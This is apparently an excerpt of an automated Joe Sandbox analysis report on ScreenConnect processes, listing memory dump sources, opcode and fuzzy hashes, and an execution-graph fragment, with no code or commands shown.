Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 374fb3477769c13f89e229d2ac969b1efaa0f817669924ced5c1c099b8f3fe7d
                                                                                                                                                                                                                                          • Instruction ID: 5a72eb671748730f7a2fee19177972ad08e0d85381c3ae69d5aad5dc3353586e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 374fb3477769c13f89e229d2ac969b1efaa0f817669924ced5c1c099b8f3fe7d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FF06DB0E8420ECFDF00DF68E92476EFBB4FB45354F004866C601D7254DB7525198B92
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 491e377dbc00f1a6379524f6372baff20061b838d0297cb208e3c317ed3598df
                                                                                                                                                                                                                                          • Instruction ID: 6a6e6f75cce09242a0bad0586f889b8d95d0f0b8fd5ea73585591c5b32180eae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 491e377dbc00f1a6379524f6372baff20061b838d0297cb208e3c317ed3598df
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89F0BEB26002405BC3266B68A8144AE7F7AEFD2256714457FD20ACB26ADF368C068B90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 699e90902fb6abea5626b40e90f719f0382215b6606c6e01b61fbfb7905eca39
                                                                                                                                                                                                                                          • Instruction ID: b4038a592f3c09b643fc95a3e3408c152bb48a35427f2ab6c027d167703baa6c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 699e90902fb6abea5626b40e90f719f0382215b6606c6e01b61fbfb7905eca39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55F0E270E0025CEFDB44EFA8D586A9CBFB5FB44345F2040AAC505A7254DB356F89CB41
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2cd7200a3176953a4f9b0506edd118f7f960c94f4fae7f7362e1681ea50ee7a5
                                                                                                                                                                                                                                          • Instruction ID: 4594c966d8c88ecafbb658e5986144eba1a0773422aac05209380f70d1a61ae4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cd7200a3176953a4f9b0506edd118f7f960c94f4fae7f7362e1681ea50ee7a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46F0A072A0D3405FC3299B7AA80199BBFEDCF86218B18C0BFD08CC3642D52884028726
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1b38c90b66dc590cf4abf7ee03fa626b09b4049b76372ba9f3ae16170fc01d44
                                                                                                                                                                                                                                          • Instruction ID: 584ba274a7e1bcf800124e8dfdb185dd86bb18874f8dcf3f9230542136456d09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b38c90b66dc590cf4abf7ee03fa626b09b4049b76372ba9f3ae16170fc01d44
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFF03A30B00114CFDB55DF6DC554AAEBBE5EF883507048069E805CB369EB39DE01CB90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8ffed8502f361c4d535f27840c7ce89ecccdb57557927dba8fc8952a4676de1c
                                                                                                                                                                                                                                          • Instruction ID: 0f19fb0377ae1e1c8f653f8b0d0dcf9c309d4ed8442b111c33c33a8438090259
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ffed8502f361c4d535f27840c7ce89ecccdb57557927dba8fc8952a4676de1c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5E06536B04259AF4B44CA4ED800DABBFAAEFC9220718C01BF809C7305DA36D91287A4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b7707d899e3f2083fb00de9757cc42fba70cd47c0f2cc77f02d344964f6eb472
                                                                                                                                                                                                                                          • Instruction ID: 0f9808f786bde6653606ef0015d9935b8e088f76180d5b7cad34a91e1df87703
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7707d899e3f2083fb00de9757cc42fba70cd47c0f2cc77f02d344964f6eb472
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DE0ED713011044BD3002BB9B87859D7FAAEBDA272320403EE50AC7282CE389C0383A1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 635145bd01acf63fe614463f6456977825832fb157aa6cb38b3cf76b0b214adf
                                                                                                                                                                                                                                          • Instruction ID: c4c4f07a6c908bf8fcc59a02c18fda0bb60e6b5d9888038e3ae1e2831b7f4501
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 635145bd01acf63fe614463f6456977825832fb157aa6cb38b3cf76b0b214adf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82E0687324020023E3086A7AE841A8E76AEEBD2225B05C57FC106DF314DE7BEC0B43D4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 217085b08111279df53794a1a39936229f7d30c7b007f41a369e61fe8e657d28
                                                                                                                                                                                                                                          • Instruction ID: 76e7f53be5ed8fae1448c2b59c8190b3320a1818597ec6298905c25fdf861088
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 217085b08111279df53794a1a39936229f7d30c7b007f41a369e61fe8e657d28
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F06DB2E002188FCB50DFACA9415EDBBF0EF58224B50816AC528EB341E3314B039FC0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fffb515070f6c88039a44ed4bcced7a5abd6093b1a7b85fd2edfc8042b4e0070
                                                                                                                                                                                                                                          • Instruction ID: 2f938faaf98c554d46fa8313b109bd4404beb6d20743a65ff6fe7c577f20288f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fffb515070f6c88039a44ed4bcced7a5abd6093b1a7b85fd2edfc8042b4e0070
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1E02632B412055FC3149A2AF8409ABF3AAEBE9764F20483ED50CD7321CE728C03CB80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9fe4e1bb75ac5602eb7b37ca865b73f417fd2599b9519b032a78a3155ada1e59
                                                                                                                                                                                                                                          • Instruction ID: 6e494a988ad6653f6d7ffab6068a0b6003c3f1e819ee44fc6116264a5b29008e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fe4e1bb75ac5602eb7b37ca865b73f417fd2599b9519b032a78a3155ada1e59
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89E0D8322002015783157769B40449E7BAEFFC5262310857FD20ACB328DF72DC0687D0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 52b58d7a418a04676a9d7b43abacf4891dd25a5824fcc55324ec239bf1c84911
                                                                                                                                                                                                                                          • Instruction ID: 7d112b11210d13093128b278f26d1c3257f75a2d0daada3a2587b75c049d49bb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52b58d7a418a04676a9d7b43abacf4891dd25a5824fcc55324ec239bf1c84911
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBE026327012051BC304A62AE840957F3AAEBD9664F10483DD50CC7311CD729C028690
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5c4486c068cdd8120ddf0e656829c62ac632b9b5da66e4ddafd90ea03525c9b6
                                                                                                                                                                                                                                          • Instruction ID: 0f4dce1032d160c61640102fd8525d9d195dcdd3036c4eec1694c14689769abc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c4486c068cdd8120ddf0e656829c62ac632b9b5da66e4ddafd90ea03525c9b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4E092343002008FC3149B1EC544E12BBEAEFC5715B1684A9E5098B3B1CB71FC41CB90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5f8c8f961971c8e4b2565d7cda8c0d7ec99206acbf79c6df55638fde9673e6c3
                                                                                                                                                                                                                                          • Instruction ID: b2498f454ceff25b27e48b5d31b9006da5754b058789f6b770627fff32230fb8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f8c8f961971c8e4b2565d7cda8c0d7ec99206acbf79c6df55638fde9673e6c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BE09AB0951108AFCB41CEA4E8408DD7BBAEB8520971881AAD004D7625EA306E128700
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 35f6d0007fcb93a9cc3fb93c504fd52287f4f7738b0f032da997f87fc775db0d
                                                                                                                                                                                                                                          • Instruction ID: 3b4f08467bb874fee49546823f5361d3b9e12963479f867b67b10b4b535660a1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35f6d0007fcb93a9cc3fb93c504fd52287f4f7738b0f032da997f87fc775db0d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03E092322093851FC726DB68F8409CD7FB5EEC2211B0849EED4409B567D6A5EA098391
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8ede62cf6c1fda6f53b71e9d36a8d418f4f4c9c9687d19df80fdd3a4dbb741f6
                                                                                                                                                                                                                                          • Instruction ID: f8b1226b33961fae0a550ba720014e279fb6773198c5c1c6c4d366999302e6e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ede62cf6c1fda6f53b71e9d36a8d418f4f4c9c9687d19df80fdd3a4dbb741f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AD017B0E4110DEFCB44DFA8E94099DBBBDEF48204B5045EED848E7210EB316E009B90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b3080200607168f64027c4b2ce1bf126e42ccbcc785f40464bcdce33ca638fee
                                                                                                                                                                                                                                          • Instruction ID: cf73d9d4dfcfd33c9ab9cbfb093686746dbed6c448118565e06f2f32c6007592
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3080200607168f64027c4b2ce1bf126e42ccbcc785f40464bcdce33ca638fee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D01770A4120CEFCB40DFA9E95095DBBB9EB49604B5045A9D408E7224EA317F009B90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0c59c3a51408c854122ed40dfc5a5f7999dfa11816bd66ee0bce072a825eee99
                                                                                                                                                                                                                                          • Instruction ID: 86ed5ec2cd13d7303635bb26eb1e8f912b873661ed1946ef69748ed42d3fd428
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c59c3a51408c854122ed40dfc5a5f7999dfa11816bd66ee0bce072a825eee99
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7D05E2800E3C00FDF02DBB070900453FA0EA47212F99D88FC880C2462C3746456CB23
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 556a1521dbd5a1f97bab8cba5773f9ae8465715e74bbc45e176300ba725a395c
                                                                                                                                                                                                                                          • Instruction ID: a5f6fe80cd6f94e69cd8a10beb47ab66009288d063768e987682fc3514336aed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 556a1521dbd5a1f97bab8cba5773f9ae8465715e74bbc45e176300ba725a395c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CC08C21E0000067FE588A71C5CB7687752F795B09FAAC06CC48BD7244CB15D003C660
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fc6a17c23167fff2b36b4f2d247f29f499071a18b120314b899a4e9934c6ad25
                                                                                                                                                                                                                                          • Instruction ID: f2181edb5459da78f437a33d9b5b88e3b51e48afcb02829e89243ddaa8eda9c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc6a17c23167fff2b36b4f2d247f29f499071a18b120314b899a4e9934c6ad25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCD0C73181470D8AC700BB78D454469F778EFD5300F05C65AE44967121FF70D5D0D681
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4bc1caedcfa702bc43600412840515b300c27ee4706538ebfe6c65ead80d0e12
                                                                                                                                                                                                                                          • Instruction ID: 195a0b285744cb075e71fa9dee30abd40f7976a368194c12ffbce0555c3af433
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bc1caedcfa702bc43600412840515b300c27ee4706538ebfe6c65ead80d0e12
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EC09B5664FBD41FF722055C78E14CD1F14DC8372D38B02D3C4C1555575109654B5151
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1963f9cac14acbba2ff183f0c0ff7c08bf0f3cde44bf077e69cdfd66bc946630
                                                                                                                                                                                                                                          • Instruction ID: b35f5709de7c1eaff1ded07bf2ad634fbf60309d1616e46e56763518ceab0552
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1963f9cac14acbba2ff183f0c0ff7c08bf0f3cde44bf077e69cdfd66bc946630
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EC0483AB41429DFCB00DB98F8848DCB370FF8922AB1001A6E619DB231C732A925CB40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0eb6ae77add54e10c84beb22618b2a9ff6cd188fe5f0027025dd1c66d7a8f010
                                                                                                                                                                                                                                          • Instruction ID: 8ecd76cd7f1403fdd00de3eec8c4ceab7a6ba169a6f326fa5a18981b47b18b1a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0eb6ae77add54e10c84beb22618b2a9ff6cd188fe5f0027025dd1c66d7a8f010
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1A002752010009BC244DB54C995C15F765EFE5319728C4AEA9198B256CF33ED13DA54

Execution Graph

Execution Coverage: 12.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 5
Total number of Limit Nodes: 1
execution_graph 13489 7ff848e78124 13491 7ff848e7812d 13489->13491 13490 7ff848e78192 13491->13490 13492 7ff848e78206 SetProcessMitigationPolicy 13491->13492 13493 7ff848e78262 13492->13493
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 8[H
                                                                                                                                                                                                                                          • API String ID: 0-2136615853
                                                                                                                                                                                                                                          • Opcode ID: 13c71cda89218e6b3c911afa516f1f1f2a34362d9b252d2dd4ed0772991ee114
                                                                                                                                                                                                                                          • Instruction ID: e238ac4acf8c2e4373c5f9e5c8d85761c97fe96803f203dddb24f86b8b4deeda
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13c71cda89218e6b3c911afa516f1f1f2a34362d9b252d2dd4ed0772991ee114
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B620431A1CA8B4FEBA9FE2894556B973D2FF943C0F5504B9D44EC72C6DE2CAC019A41
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.3299133719.00007FF849180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849180000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff849180000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 96d56df42f1dd80af314baa5b9d3c7dfc53b02aba2996be6fb87677749bcd705
                                                                                                                                                                                                                                          • Instruction ID: 0a7fd9b773e923edd14d9646c8c58473645f5daf3ee7bf7e4f924ad5cf811642
